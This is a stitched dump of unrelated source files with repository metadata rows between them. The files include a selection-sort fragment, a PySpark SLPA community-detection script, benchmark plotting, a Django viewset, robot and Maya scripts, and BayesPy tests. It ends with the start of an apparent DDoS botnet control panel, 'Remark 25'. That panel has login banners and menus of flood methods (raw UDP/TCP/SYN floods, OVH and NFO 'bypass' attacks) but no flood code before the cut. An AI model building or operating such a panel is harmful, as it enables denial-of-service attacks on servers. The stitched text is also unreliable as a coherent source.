k = i
for j in range(i+1,len(lst)):
if lst[k] > lst[j]:
k = j
if k != i:
lst[i], lst[k] = lst[k], lst[i]
| [
"33125913+Waycc@users.noreply.github.com"
] | 33125913+Waycc@users.noreply.github.com |
03642d498311f9cd8cccf5fe6deafb94f85ca1b1 | b74486d5bd8a96455572ff879df148f08d718031 | /slpa/spla.py | 0a8305aa32b2dec4dc376cbb5f29f85d170a215b | [] | no_license | hulkfolk/CS5344CommunityDetection | 87c182274628406111d5f57db9addd89204c892c | bbc5ea211e16296331149516e2ebe349d9271bc3 | refs/heads/master | 2020-08-06T13:32:52.730792 | 2019-10-26T04:03:40 | 2019-10-26T04:03:40 | 212,992,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,924 | py | import re
import sys
from pyspark import SparkConf, SparkContext
import os
import glob
import math
import argparse
import random
import json
conf = SparkConf()
sc = SparkContext(conf=conf)
def read_graph_from_file(path):
edge = sc.textFile(graph_file).flatMap(lambda x: re.split('\n',x))
node = sc.textFile(graph_file).flatMap(lambda x: re.split(r"[ \t\n]",x))
edgel = edge.map(lambda x: (re.split('\t',x)[0],re.split('\t',x)[1]))
edger = edge.map(lambda x: (re.split('\t',x)[1],re.split('\t',x)[0]))
edge = edgel.union(edger).distinct()
edge = edge.groupByKey().mapValues(list) # List speaker for each listener, (listener, (speaker1, speaker2, ...))
node = node.distinct().map(lambda x: (x, x)) # Give each node initial community lable, (node, tag)
return edge, node
def slpa(edge, node, percentage, iteration):
for i in range(1,iteration):
if i == 1:
rnode = node
else:
rnode = node.map(lambda x: (x[0],x[1][random.randint(0,len(x[1])-1)]))
itag = edge.flatMapValues(f)
itag = itag.map(lambda x: (x[1],x[0]))
itag = itag.join(rnode) # (speaker, (listener, speaker tag))
itag = itag.map(lambda x: (x[1],1)) # ((listener, speaker tag),1)
itag = itag.groupByKey().mapValues(len) # ((listener, speaker tag),count)
itag = itag.map(lambda x: (x[0][0],(x[0][1],x[1]))) # (listener, (speaker tag,count))
itag = itag.reduceByKey(lambda n1,n2: (n1[0], n1[1]) if n1[1]>=n2[1] else (n2[0],n2[1]))
itag = itag.map(lambda x: (x[0],x[1][0]))
node = node.join(itag)
if i > 1:
node = node.map(lambda x: (x[0],(x[1][0]+(x[1][1],))))# (listener, (tag1, tag2))
lsedget = node.flatMapValues(f)
writetxt(node.collect(),'ls.txt')
lsedge = lsedget.map(lambda x: (x,1))
scount = lsedget.map(lambda x: (x[0],1))
scount = scount.groupByKey().mapValues(len)
lsedge = lsedge.reduceByKey(lambda n1,n2: n1+n2)
lsedge = lsedge.map(lambda x: (x[0][0],(x[0][1],x[1]))) # (listener, (tag, tag count))
#writetxt(lsedge.collect(),'lswithoutfilter.txt')
writetxt(scount.collect(),'scount.txt')
lsedge = lsedge.join(scount) # (listener, ((tag, tag count),total tag))
writetxt(lsedge.collect(),'lsnumber.txt')
lsedge = lsedge.map(lambda x: (x[0],(x[1][0][0],float(x[1][0][1])/float(x[1][1])))) # (listener, (tag, tag count/total tag))
lsedge = lsedge.filter(lambda x: x[1][1]>=percentage)
lsedge = lsedge.map(lambda x: (x[0],x[1][0]))
writetxt(lsedge.collect(),'lswithoutfilter.txt')
node = lsedge.groupByKey().mapValues(list)
return node
def f(x): return x
def writetxt(lst,name):
with open(name,'w') as f:
#for item in lst:
f.write(json.dumps(lst))
#f.write('\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--percentage', help='percentage of community popularity', default=0.1)
parser.add_argument('--iteration', help='number of iteration', default=6)
parser.add_argument('--filename', help='file in data folder', default='com-dblp.ungraph.txt')
#parser.add_argument('--filename', help='file in data folder', default='graph.txt')
args = parser.parse_args()
graph_file = os.path.join(os.path.dirname(__file__), '..', 'data', args.filename)
edge, node = read_graph_from_file(graph_file)
print('Graph loaded\n')
percentage = args.percentage
iteration = args.iteration
node = slpa(edge, node, percentage, iteration)
community = node.flatMapValues(f)
community = community.map(lambda x: (x[1],x[0]))
community = community.groupByKey().mapValues(list)
community = community.filter(lambda x: len(x[1])>1)
community = community.map(lambda x: x[1])
#community = list(set(community.collect()))
writetxt(community.collect(),'final.txt')
print(community.collect())
| [
"noreply@github.com"
] | hulkfolk.noreply@github.com |
dd8418fe80e3b14a0d109e397f6d2685451be0d0 | 47364afd2bbae831850a2edddc23d46711fbfa2b | /analysis/perftest105.py | 833786baf4938f5ba97b66d2848360ddeae6d026 | [] | no_license | kostrzewa/chroma-auxiliary-scripts | 149d67175f537847710b65e6af69a91922bcb3a0 | 2228b396ed13961a99ffe8b8ce6d5fa35784e3ed | refs/heads/master | 2021-07-11T09:27:57.554247 | 2017-10-13T14:29:30 | 2017-10-13T14:29:30 | 106,831,418 | 0 | 0 | null | 2017-10-13T13:59:36 | 2017-10-13T13:59:36 | null | UTF-8 | Python | false | false | 2,808 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright © YEAR Martin Ueding <dev@martin-ueding.de>
import argparse
import collections
import glob
import itertools
import os
import re
import matplotlib.pyplot as pl
import numpy as np
import scipy.optimize as op
import util
def main():
options = _parse_args()
pattern = re.compile(r'0105-perf_nodes=(?P<A_nodes>\d+)_ntasks=(?P<B_ntasks>\d+)_cpus=(?P<C_cpus>\d+)_affinity=(?P<E_affinity>\w+?)/')
pattern_total_time = re.compile('HMC: total time = ([\d.]+) secs')
rows = []
for run in options.run:
print(run)
m = pattern.match(run)
if not m:
continue
cols1 = m.groupdict()
nodes = int(cols1['A_nodes'])
tasks = int(cols1['B_ntasks'])
cpus = int(cols1['C_cpus'])
cols1['D_SMT'] = tasks * cpus // 24
try:
cols2 = {
'QPhiX CG Perf': np.loadtxt(os.path.join(run, 'extract-solver-QPhiX_Clover_CG-gflops_per_node.tsv'))[1],
'QPhiX M-Shift Perf': np.loadtxt(os.path.join(run, 'extract-solver-QPhiX_Clover_M-Shift_CG-gflops_per_node.tsv'))[1],
}
except FileNotFoundError as e:
print(e)
continue
logfile = glob.glob(os.path.join(run, 'slurm-*.out'))[0]
with open(logfile) as f:
lines = f.readlines()
m = pattern_total_time.match(lines[-1])
if m:
cols2['minutes'] = float(m.group(1)) / 60
else:
cols2['minutes'] = 0
print(cols2.values())
rows.append((cols1, cols2))
print()
print()
for key in itertools.chain(sorted(cols1.keys()), sorted(cols2.keys())):
print('{:15s}'.format(str(key)[:13]), end='')
print()
for cols1, cols2 in rows:
for key, value in itertools.chain(sorted(cols1.items()), sorted(cols2.items())):
print('{:15s}'.format(str(value)[:13]), end='')
print()
for x in cols1.keys():
for y in cols2.keys():
fig, ax = util.make_figure()
data = collections.defaultdict(list)
for c1, c2 in rows:
data[c1[x]].append(c2[y])
d = [value for key, value in sorted(data.items())]
l = [key for key, value in sorted(data.items())]
ax.boxplot(d, labels=l)
ax.set_xlabel(x)
ax.set_ylabel(y)
util.save_figure(fig, 'boxplot-{}-{}'.format(x, y))
def _parse_args():
'''
Parses the command line arguments.
:return: Namespace with arguments.
:rtype: Namespace
'''
parser = argparse.ArgumentParser(description='')
parser.add_argument('run', nargs='+')
options = parser.parse_args()
return options
if __name__ == '__main__':
main()
| [
"dev@martin-ueding.de"
] | dev@martin-ueding.de |
0904c458b8c40b6d95fc8f7b0f553fdafb297a88 | bb13a1395372a965975a169ae336542476d1d6d8 | /posts/views.py | e113e5b407a3a615c995b2384eadc2691c55a730 | [] | no_license | lebedovskiy/django-vuejs-vuex-template | 5730bbe9977dcefc7da7f453ca78396f01f98286 | 5e9dc4e81e624f157c6281d759edaeaca98e17db | refs/heads/master | 2022-12-11T08:34:37.270987 | 2018-07-14T08:48:16 | 2018-07-14T08:48:16 | 140,583,662 | 0 | 0 | null | 2022-12-08T07:04:32 | 2018-07-11T14:04:19 | JavaScript | UTF-8 | Python | false | false | 390 | py | # Create your views here.
from rest_framework import viewsets
from posts.models import Post
from posts.serializers import PostSerializer
class PostViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows Posts to be viewed or edited.
"""
queryset = Post.objects.all().order_by('published_date')
post = Post.objects.get(id=1)
serializer_class = PostSerializer
| [
"lebedovskiy@mail.ru"
] | lebedovskiy@mail.ru |
86af7ad60e7cbbd6e4b2288e7097cf98510b65eb | 2d7939546af7a2167457875a23da512ce7a30d26 | /abchat/model/model.py | 64a30ff6de5b9e7d0aa80c5e403fad223c84afff | [] | no_license | cg3932/online_chat_application | 46b78073a9dc703b3bcce9f2e789d71c93361a9e | 31388143c51aafe405c47fee78250a5ebacbf888 | refs/heads/master | 2021-05-27T23:20:43.429947 | 2012-09-25T23:57:49 | 2012-09-25T23:57:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | # This file is an importer for the whole data model
# it must be imported in this way so as to not
# break relational dependencies
#
# Iain Macdonald
# ECSE 428 Team ABC
# Winter 2011
from abchat.model.user import User
from abchat.model.buddies import Buddies
from abchat.model.message import Message
from abchat.model.file import File
from abchat.model.chatroom import Chatroom
from abchat.model.chatroommessage import ChatroomMessage
from abchat.model.chatroommember import ChatroomMember
from abchat.model.chatroomban import ChatroomBan
from abchat.model.group import Group, user_group_table
from abchat.model.permission import Permission, group_permission_table
| [
"chris.gallai@gmail.com"
] | chris.gallai@gmail.com |
4ad8ad1fbd7235c212a139cdeafe67ce534debf4 | afc8d5a9b1c2dd476ea59a7211b455732806fdfd | /Configurations/WH_chargeAsymmetry/WH3l/Full2018_v7/structure.py | 6388a09a0a8e38670a88995180d3619b60830e60 | [] | no_license | latinos/PlotsConfigurations | 6d88a5ad828dde4a7f45c68765081ed182fcda21 | 02417839021e2112e740607b0fb78e09b58c930f | refs/heads/master | 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 | Python | UTF-8 | Python | false | false | 2,018 | py | # structure configuration for datacard
#structure = {}
# keys here must match keys in samples.py
#
structure['Fake'] = {
'isSignal' : 0,
'isData' : 0
}
#structure['DY'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
#
#structure['top'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
structure['WW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggWW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Wg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Zg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Vg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VVV'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['qqH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_plus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_minus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ttH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['qqH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_plus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_minus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['ZH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
# data
structure['DATA'] = {
'isSignal' : 0,
'isData' : 1
}
| [
"nicolo.trevisani@cern.ch"
] | nicolo.trevisani@cern.ch |
620ecf42cf30001f7149f9ec8fd2026093c7549c | ce63c1c0c469a22963a296eaf312838286fe59b5 | /Maya_PY/selectedPolyElementsToAENull.py | 0789546676208b0aeeb88655975f602061fa7a7d | [] | no_license | JourneyAtBuck/Code-Stubs | 95a3a0f7303c0ecdcd978bad75688cff6624a4ee | 46e2b036444bd94ff00cba5fae17e9f901744f71 | refs/heads/master | 2023-07-20T18:56:40.465748 | 2023-07-06T04:34:52 | 2023-07-06T04:34:52 | 88,553,975 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | ## makes one locator with custom prefix per selected face | vertex
import maya.cmds as cmds
import maya.mel as mel
locaPrefix = "010_text02_center"
nullPrefix = "null_" ### DON'T TOUCH ###
sel = cmds.ls(sl=True)
vertices = cmds.filterExpand(sel, sm=31) or []
faces = cmds.filterExpand(sel, sm=34) or []
edges = cmds.filterExpand(sel, sm=32) or []
selectedElements = []
if len(faces):
selectedElements = faces
elif len(vertices):
selectedElements = vertices
elif len(edges):
selectedElements = edges
counter = 1
for obj in selectedElements:
tempNull = cmds.spaceLocator(name=nullPrefix+locaPrefix+str(counter))
cmds.select(obj, r=True)
cmds.select(tempNull,add=True)
mel.eval('doCreatePointOnPolyConstraintArgList 2 { "0" ,"0" ,"0" ,"1" ,"" ,"1" ,"0" ,"0" ,"0" ,"0" };')
counter += 1
| [
"journey@buck.tv"
] | journey@buck.tv |
b7cd7a5240afedad530791addc956ba6291b5595 | 54b31b705d88e21bc0b23aabe1df15ca13a07de2 | /bayespy/inference/vmp/nodes/tests/test_concatenate.py | 26d7882980d98f8e8baf3e70236fbf7d7c701405 | [
"MIT",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"AFL-3.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bayespy/bayespy | 307ef4c51d511e14d4693cce9929dda37124d11d | 5fe58f7160ebc3a9df7f9e96e50d2bd47837794a | refs/heads/develop | 2023-08-18T21:35:27.744022 | 2023-05-25T08:16:36 | 2023-05-25T08:16:36 | 5,568,322 | 655 | 164 | MIT | 2023-08-15T09:31:55 | 2012-08-27T08:10:20 | Python | UTF-8 | Python | false | false | 10,082 | py | ################################################################################
# Copyright (C) 2015 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
"""
Unit tests for `concatenate` module.
"""
import warnings
import numpy as np
from bayespy.nodes import (Concatenate,
GaussianARD,
Gamma)
from bayespy.utils import random
from bayespy.utils.misc import TestCase
class TestConcatenate(TestCase):
"""
Unit tests for Concatenate node.
"""
def test_init(self):
"""
Test the creation of Concatenate node
"""
# One parent only
X = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X)
self.assertEqual(Y.plates, (3,))
self.assertEqual(Y.dims, ( (), () ))
X = GaussianARD(0, 1, plates=(3,), shape=(2,4))
Y = Concatenate(X)
self.assertEqual(Y.plates, (3,))
self.assertEqual(Y.dims, ( (2,4), (2,4,2,4) ))
# Two parents
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (), () ))
# Two parents with shapes
X1 = GaussianARD(0, 1, plates=(2,), shape=(4,6))
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (4,6), (4,6,4,6) ))
# Two parents with non-default axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Y = Concatenate(X1, X2, axis=-2)
self.assertEqual(Y.plates, (5,4))
self.assertEqual(Y.dims, ( (), () ))
# Three parents
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
X3 = GaussianARD(0, 1, plates=(4,), shape=())
Y = Concatenate(X1, X2, X3)
self.assertEqual(Y.plates, (9,))
self.assertEqual(Y.dims, ( (), () ))
# Constant parent
X1 = [7.2, 3.5]
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (), () ))
# Different moments
X1 = GaussianARD(0, 1, plates=(3,))
X2 = Gamma(1, 1, plates=(4,))
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
# Incompatible shapes
X1 = GaussianARD(0, 1, plates=(3,), shape=(2,))
X2 = GaussianARD(0, 1, plates=(2,), shape=())
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
# Incompatible plates
X1 = GaussianARD(0, 1, plates=(4,3), shape=())
X2 = GaussianARD(0, 1, plates=(5,2,), shape=())
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
pass
def test_message_to_child(self):
"""
Test the message to child of Concatenate node.
"""
var = lambda plates, shape: GaussianARD(
np.random.randn(*(plates + shape)),
np.random.rand(*(plates + shape)),
plates=plates,
shape=shape
)
# Two parents without shapes
X1 = var((2,), ())
X2 = var((3,), ())
Y = Concatenate(X1, X2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,)))[:2],
u1[0]*np.ones((2,)))
self.assertAllClose((u[1]*np.ones((5,)))[:2],
u1[1]*np.ones((2,)))
self.assertAllClose((u[0]*np.ones((5,)))[2:],
u2[0]*np.ones((3,)))
self.assertAllClose((u[1]*np.ones((5,)))[2:],
u2[1]*np.ones((3,)))
# Two parents with shapes
X1 = var((2,), (4,))
X2 = var((3,), (4,))
Y = Concatenate(X1, X2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[:2],
u1[1]*np.ones((2,4,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[2:],
u2[1]*np.ones((3,4,4)))
# Test with non-constant axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Y = Concatenate(X1, X2, axis=-2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4)))[:2],
u1[1]*np.ones((2,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4)))[2:],
u2[1]*np.ones((3,4)))
# Test with constant parent
X1 = np.random.randn(2, 4)
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,))
Y = Concatenate(X1, X2)
u1 = Y.parents[0].get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[:2],
u1[1]*np.ones((2,4,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[2:],
u2[1]*np.ones((3,4,4)))
pass
def test_message_to_parent(self):
"""
Test the message to parents of Concatenate node.
"""
# Two parents without shapes
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,)))[:2],
m1[0]*np.ones((2,)))
self.assertAllClose((m[1]*np.ones((5,)))[:2],
m1[1]*np.ones((2,)))
self.assertAllClose((m[0]*np.ones((5,)))[2:],
m2[0]*np.ones((3,)))
self.assertAllClose((m[1]*np.ones((5,)))[2:],
m2[1]*np.ones((3,)))
# Two parents with shapes
with warnings.catch_warnings():
warnings.simplefilter("ignore", FutureWarning)
X1 = GaussianARD(0, 1, plates=(2,), shape=(4,6))
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4,6)))[:2],
m1[0]*np.ones((2,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[:2],
m1[1]*np.ones((2,4,6,4,6)))
self.assertAllClose((m[0]*np.ones((5,4,6)))[2:],
m2[0]*np.ones((3,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[2:],
m2[1]*np.ones((3,4,6,4,6)))
# Two parents with non-default concatenation axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Z = Concatenate(X1, X2, axis=-2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4)))[:2],
m1[0]*np.ones((2,4)))
self.assertAllClose((m[1]*np.ones((5,4)))[:2],
m1[1]*np.ones((2,4)))
self.assertAllClose((m[0]*np.ones((5,4)))[2:],
m2[0]*np.ones((3,4)))
self.assertAllClose((m[1]*np.ones((5,4)))[2:],
m2[1]*np.ones((3,4)))
# Constant parent
X1 = np.random.randn(2,4,6)
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = Z._message_to_parent(0)
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4,6)))[:2],
m1[0]*np.ones((2,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[:2],
m1[1]*np.ones((2,4,6,4,6)))
self.assertAllClose((m[0]*np.ones((5,4,6)))[2:],
m2[0]*np.ones((3,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[2:],
m2[1]*np.ones((3,4,6,4,6)))
pass
def test_mask_to_parent(self):
"""
Test the mask handling in Concatenate node
"""
pass
| [
"jaakko.luttinen@iki.fi"
] | jaakko.luttinen@iki.fi |
ee93303355c66a20ff5ffdd32b3ebf107b00bc0e | f5f7a1ae04a999f3f193cca647397b29806edf73 | /0000_examples/ur3_dual_interpolation_exe.py | 09b091f802f3706ab9fd2e03f1068f6f58440932 | [
"MIT"
] | permissive | kazuki0824/wrs | bf88d1568f591c61870332436bfcd079d78b87d7 | 03c9e59779a30e2f6dedf2732ad8a46e6ac3c9f0 | refs/heads/main | 2023-07-24T05:20:02.054592 | 2021-05-31T14:38:18 | 2021-05-31T14:38:18 | 368,829,423 | 1 | 0 | MIT | 2021-05-19T10:25:48 | 2021-05-19T10:25:47 | null | UTF-8 | Python | false | false | 1,191 | py | import math
import numpy as np
import robot_con.ur.ur3_dual_x as u3r85dx
rbtx = u3r85dx.UR3DualX(lft_robot_ip='10.2.0.50', rgt_robot_ip='10.2.0.51', pc_ip='10.2.0.101')
# left randomization
current_lft_jnt_values = rbtx.lft_arm_hnd.get_jnt_values()
n_lft_jnt_values = (current_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_lft_jnt_values = (n_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_lft_jnt_values = (nn_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
# right randomization
current_rgt_jnt_values = rbtx.rgt_arm_hnd.get_jnt_values()
n_rgt_jnt_values = (current_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_rgt_jnt_values = (n_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_rgt_jnt_values = (nn_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
rbtx.move_jspace_path([current_lft_jnt_values + current_rgt_jnt_values,
n_lft_jnt_values + n_rgt_jnt_values,
nn_lft_jnt_values + nn_rgt_jnt_values,
nnn_lft_jnt_values + nnn_rgt_jnt_values], control_frequency=0.05) | [
"wanweiwei07@gmail.com"
] | wanweiwei07@gmail.com |
2126db684de1ccb27f69eae758e35dde6274bfa8 | 3a5a3dcd92570df195ab2721f4b60337a3b7fa73 | /dictionarybasic.py | 4086b51cddc477a25e36cfc9243b17a8a738aa81 | [] | no_license | VachaArraniry/python_portfolio | 6a10fb3cb1478d47c8f064a6f5158512105fa9f5 | 7023df213ad831f6acb976b1eb765b742768de57 | refs/heads/main | 2023-06-26T23:20:37.691633 | 2021-07-24T13:09:56 | 2021-07-24T13:09:56 | 389,101,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | indonesia = {
# key - value pair
'official_name': 'Republic of Indonesia',
'president': 'Jokowi',
'Capital': 'Jakarta',
'population': 250000000,
'states': ['Jawa Barat', 'DKI Jakarta', 'Jawa Tengah', 'Sumatera Utara'],
'ministers': [
{'Ministry of State Secretarist':'Pratikno'},
{'Ministry of Home Affairs':'Tito Karnavian'},
{'Ministry of Foreign Affairs':'Retno Marsudi'}
]
}
print(indonesia["president"])
indonesia["population"] = 250000000
for k in indonesia.keys():
print(k)
for v in indonesia.values():
print(v)
indonesia['population'] = 240000000
print(indonesia["population"])
for state in indonesia['states']:
print(state)
for minister in indonesia['ministers']:
for k in minister.keys():
print("{0} - {1}".format(k, minister[k]))
| [
"noreply@github.com"
] | VachaArraniry.noreply@github.com |
7df280abea1ccb7b3afafd877d4f3db45894d3a7 | 6fb5b49ab247238af7f463b3e2dd3026aa48a76f | /bin/pip | b244015394d3f9c49c9c249d0191228486ab1779 | [] | no_license | chinmayajyothi/Website | 4adc33be23f8674bdc574edcb11c523cb3ea4f2e | cf57a92e17218cf08e0901262a457e369183fa5c | refs/heads/master | 2020-03-31T12:19:15.665425 | 2015-01-25T19:44:37 | 2015-01-25T19:44:37 | 29,826,860 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | #!/home/edward/catalystcms/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==1.1','console_scripts','pip'
__requires__ = 'pip==1.1'
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.exit(
load_entry_point('pip==1.1', 'console_scripts', 'pip')()
)
| [
"skatukojwala@localhost.localdomain"
] | skatukojwala@localhost.localdomain | |
1298229e6667d5b56fca496bd5b6d2adb592dec4 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_1/kdsjor001/question2.py | b192808bc1bd49a030995b7d46e982d2aaa24594 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | a=eval(input('Enter the hours:\n'))
b=eval(input('Enter the minutes:\n'))
c=eval(input('Enter the seconds:\n'))
if 0<=a<=23 and 0<=b<=59 and 0<=c<=59:
print ('Your time is valid.')
else:
print ('Your time is invalid.') | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
3718aae08dbe2c52136b4a9d756e78fc5478a7b9 | 4677a7e89200f8566d82e7cfdb60da66c4bcf6b5 | /cnc.c | b893fe6e7692f04bc23260909d55fdd6e45b168b | [] | no_license | iShinj1/Rmark-v-something | 227bcb54ee2bff1ea927176ce153074295b72213 | 5f51745377adde57d39cba56200dff47705f440d | refs/heads/main | 2023-07-01T16:36:34.169697 | 2021-08-01T20:02:44 | 2021-08-01T20:02:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43,035 | c | #!/usr/bin/env python3
#-*- coding: utf-8 -*-
import sys
import socket
import time
import random
import threading
import getpass
import os
import urllib
import json
nicknm = "hg"
methods = """
raw - this method page is made to overwhelm servers with raw power best methods: hexraw,tcpraw
ovh - this method page is made to bypass ovh vac with raw and bypass methods best methods:ovhnat,ovhamp
nfo - this method page is made to bypass nfo with raw and syn methods best methods:mag-7,nfonull
other - this method page is a list of methods not specifacally made for any certain server best methods:ntp-x,ak47
bypass - this method page is a list of Premium bypasses and requires you to have vip ;) best methods: You find out.
"""
user = """
╔═════════════════════════════╗
║ Welcome To Remark 25 ║
║ Please Enter your Username ║
║ In the Login Prompt Below ║
╚═════════════════════════════╝
╔═════════════════════════════════════╗
║ This Source Code is ║
║ Licensed under GPU V3.0 ║
║ FOR ALLOWED USE IN 'CYBER-WARFARE' ║
╚═════════════════════════════════════╝
"""
passw = """
╔═════════════════════════════╗
║ Welcome To Remark 25 ║
║ Please Enter your Password ║
║ In the Login Prompt Below ║
╚═════════════════════════════╝
╔═════════════════════════════════════╗
║ This Source Code is ║
║ Licensed under GPU V3.0 ║
║ FOR ALLOWED USE IN 'CYBER-WARFARE' ║
╚═════════════════════════════════════╝
"""
raw = """
udpraw [IP] [TIME] [PORT] - Raw UDP Flood
tcpraw [IP] [TIME] [PORT] - Raw TCP Flood
stdraw [IP] [TIME] [PORT] - Raw STD Flood
hexraw [IP] [TIME] [PORT] - Raw HEX Flood
vseraw [IP] [TIME] [PORT] - Raw VSE Flood
synraw [IP] [TIME] [PORT] - Raw SYN Flood
"""
ovh = """
ovhslav [IP] [TIME] [PORT] - Slavic Flood
ovhkill [IP] [TIME] [PORT] - OVH Killer
